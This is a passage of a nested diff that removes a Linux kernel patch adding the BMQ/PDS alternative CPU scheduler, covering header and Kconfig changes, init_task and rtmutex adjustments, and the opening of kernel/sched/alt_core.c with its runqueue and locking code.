-+#ifdef CONFIG_SCHED_ALT
-+	u64				last_ran;
-+	s64				time_slice;
-+	int				sq_idx;
-+	struct list_head		sq_node;
-+#ifdef CONFIG_SCHED_BMQ
-+	int				boost_prio;
-+#endif /* CONFIG_SCHED_BMQ */
-+#ifdef CONFIG_SCHED_PDS
-+	u64				deadline;
-+#endif /* CONFIG_SCHED_PDS */
-+	/* sched_clock time spent running */
-+	u64				sched_time;
-+#else /* !CONFIG_SCHED_ALT */
- 	struct sched_entity		se;
- 	struct sched_rt_entity		rt;
- 	struct sched_dl_entity		dl;
-@@ -795,6 +816,7 @@ struct task_struct {
- 	unsigned long			core_cookie;
- 	unsigned int			core_occupation;
- #endif
-+#endif /* !CONFIG_SCHED_ALT */
- 
- #ifdef CONFIG_CGROUP_SCHED
- 	struct task_group		*sched_task_group;
-@@ -1545,6 +1567,15 @@ struct task_struct {
- 	 */
- };
- 
-+#ifdef CONFIG_SCHED_ALT
-+#define tsk_seruntime(t)		((t)->sched_time)
-+/* replace the uncertian rt_timeout with 0UL */
-+#define tsk_rttimeout(t)		(0UL)
-+#else /* CFS */
-+#define tsk_seruntime(t)	((t)->se.sum_exec_runtime)
-+#define tsk_rttimeout(t)	((t)->rt.timeout)
-+#endif /* !CONFIG_SCHED_ALT */
-+
- static inline struct pid *task_pid(struct task_struct *task)
- {
- 	return task->thread_pid;
-diff --git a/include/linux/sched/deadline.h b/include/linux/sched/deadline.h
-index 7c83d4d5a971..fa30f98cb2be 100644
---- a/include/linux/sched/deadline.h
-+++ b/include/linux/sched/deadline.h
-@@ -1,5 +1,24 @@
- /* SPDX-License-Identifier: GPL-2.0 */
- 
-+#ifdef CONFIG_SCHED_ALT
-+
-+static inline int dl_task(struct task_struct *p)
-+{
-+	return 0;
-+}
-+
-+#ifdef CONFIG_SCHED_BMQ
-+#define __tsk_deadline(p)	(0UL)
-+#endif
-+
-+#ifdef CONFIG_SCHED_PDS
-+#define __tsk_deadline(p)	((((u64) ((p)->prio))<<56) | (p)->deadline)
-+#endif
-+
-+#else
-+
-+#define __tsk_deadline(p)	((p)->dl.deadline)
-+
- /*
-  * SCHED_DEADLINE tasks has negative priorities, reflecting
-  * the fact that any of them has higher prio than RT and
-@@ -21,6 +40,7 @@ static inline int dl_task(struct task_struct *p)
- {
- 	return dl_prio(p->prio);
- }
-+#endif /* CONFIG_SCHED_ALT */
- 
- static inline bool dl_time_before(u64 a, u64 b)
- {
-diff --git a/include/linux/sched/prio.h b/include/linux/sched/prio.h
-index ab83d85e1183..6af9ae681116 100644
---- a/include/linux/sched/prio.h
-+++ b/include/linux/sched/prio.h
-@@ -18,6 +18,32 @@
- #define MAX_PRIO		(MAX_RT_PRIO + NICE_WIDTH)
- #define DEFAULT_PRIO		(MAX_RT_PRIO + NICE_WIDTH / 2)
- 
-+#ifdef CONFIG_SCHED_ALT
-+
-+/* Undefine MAX_PRIO and DEFAULT_PRIO */
-+#undef MAX_PRIO
-+#undef DEFAULT_PRIO
-+
-+/* +/- priority levels from the base priority */
-+#ifdef CONFIG_SCHED_BMQ
-+#define MAX_PRIORITY_ADJ	(7)
-+
-+#define MIN_NORMAL_PRIO		(MAX_RT_PRIO)
-+#define MAX_PRIO		(MIN_NORMAL_PRIO + NICE_WIDTH)
-+#define DEFAULT_PRIO		(MIN_NORMAL_PRIO + NICE_WIDTH / 2)
-+#endif
-+
-+#ifdef CONFIG_SCHED_PDS
-+#define MAX_PRIORITY_ADJ	(0)
-+
-+#define MIN_NORMAL_PRIO		(128)
-+#define NORMAL_PRIO_NUM		(64)
-+#define MAX_PRIO		(MIN_NORMAL_PRIO + NORMAL_PRIO_NUM)
-+#define DEFAULT_PRIO		(MAX_PRIO - NICE_WIDTH / 2)
-+#endif
-+
-+#endif /* CONFIG_SCHED_ALT */
-+
- /*
-  * Convert user-nice values [ -20 ... 0 ... 19 ]
-  * to static priority [ MAX_RT_PRIO..MAX_PRIO-1 ],
-diff --git a/include/linux/sched/rt.h b/include/linux/sched/rt.h
-index 994c25640e15..8c050a59ece1 100644
---- a/include/linux/sched/rt.h
-+++ b/include/linux/sched/rt.h
-@@ -24,8 +24,10 @@ static inline bool task_is_realtime(struct task_struct *tsk)
- 
- 	if (policy == SCHED_FIFO || policy == SCHED_RR)
- 		return true;
-+#ifndef CONFIG_SCHED_ALT
- 	if (policy == SCHED_DEADLINE)
- 		return true;
-+#endif
- 	return false;
- }
- 
-diff --git a/include/linux/sched/topology.h b/include/linux/sched/topology.h
-index 816df6cc444e..c8da08e18c91 100644
---- a/include/linux/sched/topology.h
-+++ b/include/linux/sched/topology.h
-@@ -234,7 +234,8 @@ static inline bool cpus_share_cache(int this_cpu, int that_cpu)
- 
- #endif	/* !CONFIG_SMP */
- 
--#if defined(CONFIG_ENERGY_MODEL) && defined(CONFIG_CPU_FREQ_GOV_SCHEDUTIL)
-+#if defined(CONFIG_ENERGY_MODEL) && defined(CONFIG_CPU_FREQ_GOV_SCHEDUTIL) && \
-+	!defined(CONFIG_SCHED_ALT)
- extern void rebuild_sched_domains_energy(void);
- #else
- static inline void rebuild_sched_domains_energy(void)
-diff --git a/init/Kconfig b/init/Kconfig
-index 94125d3b6893..c87ba766d354 100644
---- a/init/Kconfig
-+++ b/init/Kconfig
-@@ -819,6 +819,7 @@ menu "Scheduler features"
- config UCLAMP_TASK
- 	bool "Enable utilization clamping for RT/FAIR tasks"
- 	depends on CPU_FREQ_GOV_SCHEDUTIL
-+	depends on !SCHED_ALT
- 	help
- 	  This feature enables the scheduler to track the clamped utilization
- 	  of each CPU based on RUNNABLE tasks scheduled on that CPU.
-@@ -865,6 +866,35 @@ config UCLAMP_BUCKETS_COUNT
- 
- 	  If in doubt, use the default value.
- 
-+menuconfig SCHED_ALT
-+	bool "Alternative CPU Schedulers"
-+	default y
-+	help
-+	  This feature enable alternative CPU scheduler"
-+
-+if SCHED_ALT
-+
-+choice
-+	prompt "Alternative CPU Scheduler"
-+	default SCHED_BMQ
-+
-+config SCHED_BMQ
-+	bool "BMQ CPU scheduler"
-+	help
-+	  The BitMap Queue CPU scheduler for excellent interactivity and
-+	  responsiveness on the desktop and solid scalability on normal
-+	  hardware and commodity servers.
-+
-+config SCHED_PDS
-+	bool "PDS CPU scheduler"
-+	help
-+	  The Priority and Deadline based Skip list multiple queue CPU
-+	  Scheduler.
-+
-+endchoice
-+
-+endif
-+
- endmenu
- 
- #
-@@ -918,6 +948,7 @@ config NUMA_BALANCING
- 	depends on ARCH_SUPPORTS_NUMA_BALANCING
- 	depends on !ARCH_WANT_NUMA_VARIABLE_LOCALITY
- 	depends on SMP && NUMA && MIGRATION && !PREEMPT_RT
-+	depends on !SCHED_ALT
- 	help
- 	  This option adds support for automatic NUMA aware memory/task placement.
- 	  The mechanism is quite primitive and is based on migrating memory when
-@@ -1015,6 +1046,7 @@ config FAIR_GROUP_SCHED
- 	depends on CGROUP_SCHED
- 	default CGROUP_SCHED
- 
-+if !SCHED_ALT
- config CFS_BANDWIDTH
- 	bool "CPU bandwidth provisioning for FAIR_GROUP_SCHED"
- 	depends on FAIR_GROUP_SCHED
-@@ -1037,6 +1069,7 @@ config RT_GROUP_SCHED
- 	  realtime bandwidth for them.
- 	  See Documentation/scheduler/sched-rt-group.rst for more information.
- 
-+endif #!SCHED_ALT
- endif #CGROUP_SCHED
- 
- config UCLAMP_TASK_GROUP
-@@ -1281,6 +1314,7 @@ config CHECKPOINT_RESTORE
- 
- config SCHED_AUTOGROUP
- 	bool "Automatic process group scheduling"
-+	depends on !SCHED_ALT
- 	select CGROUPS
- 	select CGROUP_SCHED
- 	select FAIR_GROUP_SCHED
-diff --git a/init/init_task.c b/init/init_task.c
-index ff6c4b9bfe6b..19e9c662d1a1 100644
---- a/init/init_task.c
-+++ b/init/init_task.c
-@@ -75,9 +75,15 @@ struct task_struct init_task
- 	.stack		= init_stack,
- 	.usage		= REFCOUNT_INIT(2),
- 	.flags		= PF_KTHREAD,
-+#ifdef CONFIG_SCHED_ALT
-+	.prio		= DEFAULT_PRIO + MAX_PRIORITY_ADJ,
-+	.static_prio	= DEFAULT_PRIO,
-+	.normal_prio	= DEFAULT_PRIO + MAX_PRIORITY_ADJ,
-+#else
- 	.prio		= MAX_PRIO - 20,
- 	.static_prio	= MAX_PRIO - 20,
- 	.normal_prio	= MAX_PRIO - 20,
-+#endif
- 	.policy		= SCHED_NORMAL,
- 	.cpus_ptr	= &init_task.cpus_mask,
- 	.user_cpus_ptr	= NULL,
-@@ -88,6 +94,17 @@ struct task_struct init_task
- 	.restart_block	= {
- 		.fn = do_no_restart_syscall,
- 	},
-+#ifdef CONFIG_SCHED_ALT
-+	.sq_node	= LIST_HEAD_INIT(init_task.sq_node),
-+#ifdef CONFIG_SCHED_BMQ
-+	.boost_prio	= 0,
-+	.sq_idx		= 15,
-+#endif
-+#ifdef CONFIG_SCHED_PDS
-+	.deadline	= 0,
-+#endif
-+	.time_slice	= HZ,
-+#else
- 	.se		= {
- 		.group_node 	= LIST_HEAD_INIT(init_task.se.group_node),
- 	},
-@@ -95,6 +112,7 @@ struct task_struct init_task
- 		.run_list	= LIST_HEAD_INIT(init_task.rt.run_list),
- 		.time_slice	= RR_TIMESLICE,
- 	},
-+#endif
- 	.tasks		= LIST_HEAD_INIT(init_task.tasks),
- #ifdef CONFIG_SMP
- 	.pushable_tasks	= PLIST_NODE_INIT(init_task.pushable_tasks, MAX_PRIO),
-diff --git a/kernel/Kconfig.preempt b/kernel/Kconfig.preempt
-index c2f1fd95a821..41654679b1b2 100644
---- a/kernel/Kconfig.preempt
-+++ b/kernel/Kconfig.preempt
-@@ -117,7 +117,7 @@ config PREEMPT_DYNAMIC
- 
- config SCHED_CORE
- 	bool "Core Scheduling for SMT"
--	depends on SCHED_SMT
-+	depends on SCHED_SMT && !SCHED_ALT
- 	help
- 	  This option permits Core Scheduling, a means of coordinated task
- 	  selection across SMT siblings. When enabled -- see
-diff --git a/kernel/cgroup/cpuset.c b/kernel/cgroup/cpuset.c
-index b474289c15b8..a23224b45b03 100644
---- a/kernel/cgroup/cpuset.c
-+++ b/kernel/cgroup/cpuset.c
-@@ -787,7 +787,7 @@ static int validate_change(struct cpuset *cur, struct cpuset *trial)
- 	return ret;
- }
- 
--#ifdef CONFIG_SMP
-+#if defined(CONFIG_SMP) && !defined(CONFIG_SCHED_ALT)
- /*
-  * Helper routine for generate_sched_domains().
-  * Do cpusets a, b have overlapping effective cpus_allowed masks?
-@@ -1183,7 +1183,7 @@ static void rebuild_sched_domains_locked(void)
- 	/* Have scheduler rebuild the domains */
- 	partition_and_rebuild_sched_domains(ndoms, doms, attr);
- }
--#else /* !CONFIG_SMP */
-+#else /* !CONFIG_SMP || CONFIG_SCHED_ALT */
- static void rebuild_sched_domains_locked(void)
- {
- }
-diff --git a/kernel/delayacct.c b/kernel/delayacct.c
-index e39cb696cfbd..463423572e09 100644
---- a/kernel/delayacct.c
-+++ b/kernel/delayacct.c
-@@ -150,7 +150,7 @@ int delayacct_add_tsk(struct taskstats *d, struct task_struct *tsk)
- 	 */
- 	t1 = tsk->sched_info.pcount;
- 	t2 = tsk->sched_info.run_delay;
--	t3 = tsk->se.sum_exec_runtime;
-+	t3 = tsk_seruntime(tsk);
- 
- 	d->cpu_count += t1;
- 
-diff --git a/kernel/exit.c b/kernel/exit.c
-index 35e0a31a0315..64e368441cf4 100644
---- a/kernel/exit.c
-+++ b/kernel/exit.c
-@@ -125,7 +125,7 @@ static void __exit_signal(struct task_struct *tsk)
- 			sig->curr_target = next_thread(tsk);
- 	}
- 
--	add_device_randomness((const void*) &tsk->se.sum_exec_runtime,
-+	add_device_randomness((const void*) &tsk_seruntime(tsk),
- 			      sizeof(unsigned long long));
- 
- 	/*
-@@ -146,7 +146,7 @@ static void __exit_signal(struct task_struct *tsk)
- 	sig->inblock += task_io_get_inblock(tsk);
- 	sig->oublock += task_io_get_oublock(tsk);
- 	task_io_accounting_add(&sig->ioac, &tsk->ioac);
--	sig->sum_sched_runtime += tsk->se.sum_exec_runtime;
-+	sig->sum_sched_runtime += tsk_seruntime(tsk);
- 	sig->nr_threads--;
- 	__unhash_process(tsk, group_dead);
- 	write_sequnlock(&sig->stats_lock);
-diff --git a/kernel/locking/rtmutex.c b/kernel/locking/rtmutex.c
-index 7779ee8abc2a..5b9893cdfb1b 100644
---- a/kernel/locking/rtmutex.c
-+++ b/kernel/locking/rtmutex.c
-@@ -300,21 +300,25 @@ static __always_inline void
- waiter_update_prio(struct rt_mutex_waiter *waiter, struct task_struct *task)
- {
- 	waiter->prio = __waiter_prio(task);
--	waiter->deadline = task->dl.deadline;
-+	waiter->deadline = __tsk_deadline(task);
- }
- 
- /*
-  * Only use with rt_mutex_waiter_{less,equal}()
-  */
- #define task_to_waiter(p)	\
--	&(struct rt_mutex_waiter){ .prio = __waiter_prio(p), .deadline = (p)->dl.deadline }
-+	&(struct rt_mutex_waiter){ .prio = __waiter_prio(p), .deadline = __tsk_deadline(p) }
- 
- static __always_inline int rt_mutex_waiter_less(struct rt_mutex_waiter *left,
- 						struct rt_mutex_waiter *right)
- {
-+#ifdef CONFIG_SCHED_PDS
-+	return (left->deadline < right->deadline);
-+#else
- 	if (left->prio < right->prio)
- 		return 1;
- 
-+#ifndef CONFIG_SCHED_BMQ
- 	/*
- 	 * If both waiters have dl_prio(), we check the deadlines of the
- 	 * associated tasks.
-@@ -323,16 +327,22 @@ static __always_inline int rt_mutex_waiter_less(struct rt_mutex_waiter *left,
- 	 */
- 	if (dl_prio(left->prio))
- 		return dl_time_before(left->deadline, right->deadline);
-+#endif
- 
- 	return 0;
-+#endif
- }
- 
- static __always_inline int rt_mutex_waiter_equal(struct rt_mutex_waiter *left,
- 						 struct rt_mutex_waiter *right)
- {
-+#ifdef CONFIG_SCHED_PDS
-+	return (left->deadline == right->deadline);
-+#else
- 	if (left->prio != right->prio)
- 		return 0;
- 
-+#ifndef CONFIG_SCHED_BMQ
- 	/*
- 	 * If both waiters have dl_prio(), we check the deadlines of the
- 	 * associated tasks.
-@@ -341,8 +351,10 @@ static __always_inline int rt_mutex_waiter_equal(struct rt_mutex_waiter *left,
- 	 */
- 	if (dl_prio(left->prio))
- 		return left->deadline == right->deadline;
-+#endif
- 
- 	return 1;
-+#endif
- }
- 
- static inline bool rt_mutex_steal(struct rt_mutex_waiter *waiter,
-diff --git a/kernel/sched/Makefile b/kernel/sched/Makefile
-index 976092b7bd45..31d587c16ec1 100644
---- a/kernel/sched/Makefile
-+++ b/kernel/sched/Makefile
-@@ -28,7 +28,12 @@ endif
- # These compilation units have roughly the same size and complexity - so their
- # build parallelizes well and finishes roughly at once:
- #
-+ifdef CONFIG_SCHED_ALT
-+obj-y += alt_core.o
-+obj-$(CONFIG_SCHED_DEBUG) += alt_debug.o
-+else
- obj-y += core.o
- obj-y += fair.o
-+endif
- obj-y += build_policy.o
- obj-y += build_utility.o
-diff --git a/kernel/sched/alt_core.c b/kernel/sched/alt_core.c
-new file mode 100644
-index 000000000000..a9e906b229eb
---- /dev/null
-+++ b/kernel/sched/alt_core.c
-@@ -0,0 +1,7982 @@
-+/*
-+ *  kernel/sched/alt_core.c
-+ *
-+ *  Core alternative kernel scheduler code and related syscalls
-+ *
-+ *  Copyright (C) 1991-2002  Linus Torvalds
-+ *
-+ *  2009-08-13	Brainfuck deadline scheduling policy by Con Kolivas deletes
-+ *		a whole lot of those previous things.
-+ *  2017-09-06	Priority and Deadline based Skip list multiple queue kernel
-+ *		scheduler by Alfred Chen.
-+ *  2019-02-20	BMQ(BitMap Queue) kernel scheduler by Alfred Chen.
-+ */
-+#include <linux/sched/cputime.h>
-+#include <linux/sched/debug.h>
-+#include <linux/sched/isolation.h>
-+#include <linux/sched/loadavg.h>
-+#include <linux/sched/mm.h>
-+#include <linux/sched/nohz.h>
-+#include <linux/sched/stat.h>
-+#include <linux/sched/wake_q.h>
-+
-+#include <linux/blkdev.h>
-+#include <linux/context_tracking.h>
-+#include <linux/cpuset.h>
-+#include <linux/delayacct.h>
-+#include <linux/init_task.h>
-+#include <linux/kcov.h>
-+#include <linux/kprobes.h>
-+#include <linux/nmi.h>
-+#include <linux/scs.h>
-+
-+#include <uapi/linux/sched/types.h>
-+
-+#include <asm/irq_regs.h>
-+#include <asm/switch_to.h>
-+
-+#define CREATE_TRACE_POINTS
-+#include <trace/events/sched.h>
-+#undef CREATE_TRACE_POINTS
-+
-+#include "sched.h"
-+
-+#include "pelt.h"
-+
-+#include "../../io_uring/io-wq.h"
-+#include "../smpboot.h"
-+
-+/*
-+ * Export tracepoints that act as a bare tracehook (ie: have no trace event
-+ * associated with them) to allow external modules to probe them.
-+ */
-+EXPORT_TRACEPOINT_SYMBOL_GPL(pelt_irq_tp);
-+
-+#ifdef CONFIG_SCHED_DEBUG
-+#define sched_feat(x)	(1)
-+/*
-+ * Print a warning if need_resched is set for the given duration (if
-+ * LATENCY_WARN is enabled).
-+ *
-+ * If sysctl_resched_latency_warn_once is set, only one warning will be shown
-+ * per boot.
-+ */
-+__read_mostly int sysctl_resched_latency_warn_ms = 100;
-+__read_mostly int sysctl_resched_latency_warn_once = 1;
-+#else
-+#define sched_feat(x)	(0)
-+#endif /* CONFIG_SCHED_DEBUG */
-+
-+#define ALT_SCHED_VERSION "v6.1-r4"
-+
-+/* rt_prio(prio) defined in include/linux/sched/rt.h */
-+#define rt_task(p)		rt_prio((p)->prio)
-+#define rt_policy(policy)	((policy) == SCHED_FIFO || (policy) == SCHED_RR)
-+#define task_has_rt_policy(p)	(rt_policy((p)->policy))
-+
-+#define STOP_PRIO		(MAX_RT_PRIO - 1)
-+
-+/* Default time slice is 4 in ms, can be set via kernel parameter "sched_timeslice" */
-+u64 sched_timeslice_ns __read_mostly = (4 << 20);
-+
-+static inline void requeue_task(struct task_struct *p, struct rq *rq, int idx);
-+
-+#ifdef CONFIG_SCHED_BMQ
-+#include "bmq.h"
-+#endif
-+#ifdef CONFIG_SCHED_PDS
-+#include "pds.h"
-+#endif
-+
-+static int __init sched_timeslice(char *str)
-+{
-+	int timeslice_ms;
-+
-+	get_option(&str, &timeslice_ms);
-+	if (2 != timeslice_ms)
-+		timeslice_ms = 4;
-+	sched_timeslice_ns = timeslice_ms << 20;
-+	sched_timeslice_imp(timeslice_ms);
-+
-+	return 0;
-+}
-+early_param("sched_timeslice", sched_timeslice);
-+
-+/* Reschedule if less than this many μs left */
-+#define RESCHED_NS		(100 << 10)
-+
-+/**
-+ * sched_yield_type - Choose what sort of yield sched_yield will perform.
-+ * 0: No yield.
-+ * 1: Deboost and requeue task. (default)
-+ * 2: Set rq skip task.
-+ */
-+int sched_yield_type __read_mostly = 1;
-+
-+#ifdef CONFIG_SMP
-+static cpumask_t sched_rq_pending_mask ____cacheline_aligned_in_smp;
-+
-+DEFINE_PER_CPU(cpumask_t [NR_CPU_AFFINITY_LEVELS], sched_cpu_topo_masks);
-+DEFINE_PER_CPU(cpumask_t *, sched_cpu_llc_mask);
-+DEFINE_PER_CPU(cpumask_t *, sched_cpu_topo_end_mask);
-+
-+#ifdef CONFIG_SCHED_SMT
-+DEFINE_STATIC_KEY_FALSE(sched_smt_present);
-+EXPORT_SYMBOL_GPL(sched_smt_present);
-+#endif
-+
-+/*
-+ * Keep a unique ID per domain (we use the first CPUs number in the cpumask of
-+ * the domain), this allows us to quickly tell if two cpus are in the same cache
-+ * domain, see cpus_share_cache().
-+ */
-+DEFINE_PER_CPU(int, sd_llc_id);
-+#endif /* CONFIG_SMP */
-+
-+static DEFINE_MUTEX(sched_hotcpu_mutex);
-+
-+DEFINE_PER_CPU_SHARED_ALIGNED(struct rq, runqueues);
-+
-+#ifndef prepare_arch_switch
-+# define prepare_arch_switch(next)	do { } while (0)
-+#endif
-+#ifndef finish_arch_post_lock_switch
-+# define finish_arch_post_lock_switch()	do { } while (0)
-+#endif
-+
-+#ifdef CONFIG_SCHED_SMT
-+static cpumask_t sched_sg_idle_mask ____cacheline_aligned_in_smp;
-+#endif
-+static cpumask_t sched_preempt_mask[SCHED_QUEUE_BITS] ____cacheline_aligned_in_smp;
-+static cpumask_t *const sched_idle_mask = &sched_preempt_mask[0];
-+
-+/* sched_queue related functions */
-+static inline void sched_queue_init(struct sched_queue *q)
-+{
-+	int i;
-+
-+	bitmap_zero(q->bitmap, SCHED_QUEUE_BITS);
-+	for(i = 0; i < SCHED_BITS; i++)
-+		INIT_LIST_HEAD(&q->heads[i]);
-+}
-+
-+/*
-+ * Init idle task and put into queue structure of rq
-+ * IMPORTANT: may be called multiple times for a single cpu
-+ */
-+static inline void sched_queue_init_idle(struct sched_queue *q,
-+					 struct task_struct *idle)
-+{
-+	idle->sq_idx = IDLE_TASK_SCHED_PRIO;
-+	INIT_LIST_HEAD(&q->heads[idle->sq_idx]);
-+	list_add(&idle->sq_node, &q->heads[idle->sq_idx]);
-+}
-+
-+static inline void
-+clear_recorded_preempt_mask(int pr, int low, int high, int cpu)
-+{
-+	if (low < pr && pr <= high)
-+		cpumask_clear_cpu(cpu, sched_preempt_mask + SCHED_QUEUE_BITS - pr);
-+}
-+
-+static inline void
-+set_recorded_preempt_mask(int pr, int low, int high, int cpu)
-+{
-+	if (low < pr && pr <= high)
-+		cpumask_set_cpu(cpu, sched_preempt_mask + SCHED_QUEUE_BITS - pr);
-+}
-+
-+static atomic_t sched_prio_record = ATOMIC_INIT(0);
-+
-+/* water mark related functions */
-+static inline void update_sched_preempt_mask(struct rq *rq)
-+{
-+	unsigned long prio = find_first_bit(rq->queue.bitmap, SCHED_QUEUE_BITS);
-+	unsigned long last_prio = rq->prio;
-+	int cpu, pr;
-+
-+	if (prio == last_prio)
-+		return;
-+
-+	rq->prio = prio;
-+	cpu = cpu_of(rq);
-+	pr = atomic_read(&sched_prio_record);
-+
-+	if (prio < last_prio) {
-+		if (IDLE_TASK_SCHED_PRIO == last_prio) {
-+			cpumask_clear_cpu(cpu, sched_idle_mask);
-+			last_prio -= 2;
-+#ifdef CONFIG_SCHED_SMT
-+			if (static_branch_likely(&sched_smt_present))
-+				cpumask_andnot(&sched_sg_idle_mask,
-+					       &sched_sg_idle_mask, cpu_smt_mask(cpu));
-+#endif
-+		}
-+		clear_recorded_preempt_mask(pr, prio, last_prio, cpu);
-+
-+		return;
-+	}
-+	/* last_prio < prio */
-+	if (IDLE_TASK_SCHED_PRIO == prio) {
-+		cpumask_set_cpu(cpu, sched_idle_mask);
-+		prio -= 2;
-+#ifdef CONFIG_SCHED_SMT
-+		if (static_branch_likely(&sched_smt_present)) {
-+			cpumask_t tmp;
-+
-+			cpumask_and(&tmp, cpu_smt_mask(cpu), sched_idle_mask);
-+			if (cpumask_equal(&tmp, cpu_smt_mask(cpu)))
-+				cpumask_or(&sched_sg_idle_mask,
-+					   &sched_sg_idle_mask, cpu_smt_mask(cpu));
-+		}
-+#endif
-+	}
-+	set_recorded_preempt_mask(pr, last_prio, prio, cpu);
-+}
-+
-+/*
-+ * This routine assume that the idle task always in queue
-+ */
-+static inline struct task_struct *sched_rq_first_task(struct rq *rq)
-+{
-+	unsigned long idx = find_first_bit(rq->queue.bitmap, SCHED_QUEUE_BITS);
-+	const struct list_head *head = &rq->queue.heads[sched_prio2idx(idx, rq)];
-+
-+	return list_first_entry(head, struct task_struct, sq_node);
-+}
-+
-+static inline struct task_struct *
-+sched_rq_next_task(struct task_struct *p, struct rq *rq)
-+{
-+	unsigned long idx = p->sq_idx;
-+	struct list_head *head = &rq->queue.heads[idx];
-+
-+	if (list_is_last(&p->sq_node, head)) {
-+		idx = find_next_bit(rq->queue.bitmap, SCHED_QUEUE_BITS,
-+				    sched_idx2prio(idx, rq) + 1);
-+		head = &rq->queue.heads[sched_prio2idx(idx, rq)];
-+
-+		return list_first_entry(head, struct task_struct, sq_node);
-+	}
-+
-+	return list_next_entry(p, sq_node);
-+}
-+
-+static inline struct task_struct *rq_runnable_task(struct rq *rq)
-+{
-+	struct task_struct *next = sched_rq_first_task(rq);
-+
-+	if (unlikely(next == rq->skip))
-+		next = sched_rq_next_task(next, rq);
-+
-+	return next;
-+}
-+
-+/*
-+ * Serialization rules:
-+ *
-+ * Lock order:
-+ *
-+ *   p->pi_lock
-+ *     rq->lock
-+ *       hrtimer_cpu_base->lock (hrtimer_start() for bandwidth controls)
-+ *
-+ *  rq1->lock
-+ *    rq2->lock  where: rq1 < rq2
-+ *
-+ * Regular state:
-+ *
-+ * Normal scheduling state is serialized by rq->lock. __schedule() takes the
-+ * local CPU's rq->lock, it optionally removes the task from the runqueue and
-+ * always looks at the local rq data structures to find the most eligible task
-+ * to run next.
-+ *
-+ * Task enqueue is also under rq->lock, possibly taken from another CPU.
-+ * Wakeups from another LLC domain might use an IPI to transfer the enqueue to
-+ * the local CPU to avoid bouncing the runqueue state around [ see
-+ * ttwu_queue_wakelist() ]
-+ *
-+ * Task wakeup, specifically wakeups that involve migration, are horribly
-+ * complicated to avoid having to take two rq->locks.
-+ *
-+ * Special state:
-+ *
-+ * System-calls and anything external will use task_rq_lock() which acquires
-+ * both p->pi_lock and rq->lock. As a consequence the state they change is
-+ * stable while holding either lock:
-+ *
-+ *  - sched_setaffinity()/
-+ *    set_cpus_allowed_ptr():	p->cpus_ptr, p->nr_cpus_allowed
-+ *  - set_user_nice():		p->se.load, p->*prio
-+ *  - __sched_setscheduler():	p->sched_class, p->policy, p->*prio,
-+ *				p->se.load, p->rt_priority,
-+ *				p->dl.dl_{runtime, deadline, period, flags, bw, density}
-+ *  - sched_setnuma():		p->numa_preferred_nid
-+ *  - sched_move_task():        p->sched_task_group
-+ *  - uclamp_update_active()	p->uclamp*
-+ *
-+ * p->state <- TASK_*:
-+ *
-+ *   is changed locklessly using set_current_state(), __set_current_state() or
-+ *   set_special_state(), see their respective comments, or by
-+ *   try_to_wake_up(). This latter uses p->pi_lock to serialize against
-+ *   concurrent self.
-+ *
-+ * p->on_rq <- { 0, 1 = TASK_ON_RQ_QUEUED, 2 = TASK_ON_RQ_MIGRATING }:
-+ *
-+ *   is set by activate_task() and cleared by deactivate_task(), under
-+ *   rq->lock. Non-zero indicates the task is runnable, the special
-+ *   ON_RQ_MIGRATING state is used for migration without holding both
-+ *   rq->locks. It indicates task_cpu() is not stable, see task_rq_lock().
-+ *
-+ * p->on_cpu <- { 0, 1 }:
-+ *
-+ *   is set by prepare_task() and cleared by finish_task() such that it will be
-+ *   set before p is scheduled-in and cleared after p is scheduled-out, both
-+ *   under rq->lock. Non-zero indicates the task is running on its CPU.
-+ *
-+ *   [ The astute reader will observe that it is possible for two tasks on one
-+ *     CPU to have ->on_cpu = 1 at the same time. ]
-+ *
-+ * task_cpu(p): is changed by set_task_cpu(), the rules are:
-+ *
-+ *  - Don't call set_task_cpu() on a blocked task:
-+ *
-+ *    We don't care what CPU we're not running on, this simplifies hotplug,
-+ *    the CPU assignment of blocked tasks isn't required to be valid.
-+ *
-+ *  - for try_to_wake_up(), called under p->pi_lock:
-+ *
-+ *    This allows try_to_wake_up() to only take one rq->lock, see its comment.
-+ *
-+ *  - for migration called under rq->lock:
-+ *    [ see task_on_rq_migrating() in task_rq_lock() ]
-+ *
-+ *    o move_queued_task()
-+ *    o detach_task()
-+ *
-+ *  - for migration called under double_rq_lock():
-+ *
-+ *    o __migrate_swap_task()
-+ *    o push_rt_task() / pull_rt_task()
-+ *    o push_dl_task() / pull_dl_task()
-+ *    o dl_task_offline_migration()
-+ *
-+ */
-+
-+/*
-+ * Context: p->pi_lock
-+ */
-+static inline struct rq
-+*__task_access_lock(struct task_struct *p, raw_spinlock_t **plock)
-+{
-+	struct rq *rq;
-+	for (;;) {
-+		rq = task_rq(p);
-+		if (p->on_cpu || task_on_rq_queued(p)) {
-+			raw_spin_lock(&rq->lock);
-+			if (likely((p->on_cpu || task_on_rq_queued(p))
-+				   && rq == task_rq(p))) {
-+				*plock = &rq->lock;
-+				return rq;
-+			}
-+			raw_spin_unlock(&rq->lock);
-+		} else if (task_on_rq_migrating(p)) {
-+			do {
-+				cpu_relax();
-+			} while (unlikely(task_on_rq_migrating(p)));
-+		} else {
-+			*plock = NULL;
-+			return rq;
-+		}
-+	}
-+}
-+
-+static inline void
-+__task_access_unlock(struct task_struct *p, raw_spinlock_t *lock)
-+{
-+	if (NULL != lock)
-+		raw_spin_unlock(lock);
-+}
-+
-+static inline struct rq
-+*task_access_lock_irqsave(struct task_struct *p, raw_spinlock_t **plock,
-+			  unsigned long *flags)
-+{
-+	struct rq *rq;
-+	for (;;) {
-+		rq = task_rq(p);
-+		if (p->on_cpu || task_on_rq_queued(p)) {
-+			raw_spin_lock_irqsave(&rq->lock, *flags);
-+			if (likely((p->on_cpu || task_on_rq_queued(p))
-+				   && rq == task_rq(p))) {
-+				*plock = &rq->lock;
-+				return rq;
-+			}
-+			raw_spin_unlock_irqrestore(&rq->lock, *flags);
-+		} else if (task_on_rq_migrating(p)) {
-+			do {
-+				cpu_relax();
-+			} while (unlikely(task_on_rq_migrating(p)));
-+		} else {
-+			raw_spin_lock_irqsave(&p->pi_lock, *flags);
-+			if (likely(!p->on_cpu && !p->on_rq &&
-+				   rq == task_rq(p))) {
-+				*plock = &p->pi_lock;
-+				return rq;
-+			}
-+			raw_spin_unlock_irqrestore(&p->pi_lock, *flags);
-+		}
-+	}
-+}
-+
-+static inline void
-+task_access_unlock_irqrestore(struct task_struct *p, raw_spinlock_t *lock,
-+			      unsigned long *flags)
-+{
-+	raw_spin_unlock_irqrestore(lock, *flags);
-+}
-+
-+/*
-+ * __task_rq_lock - lock the rq @p resides on.
-+ */
-+struct rq *__task_rq_lock(struct task_struct *p, struct rq_flags *rf)
-+	__acquires(rq->lock)
-+{
-+	struct rq *rq;
-+
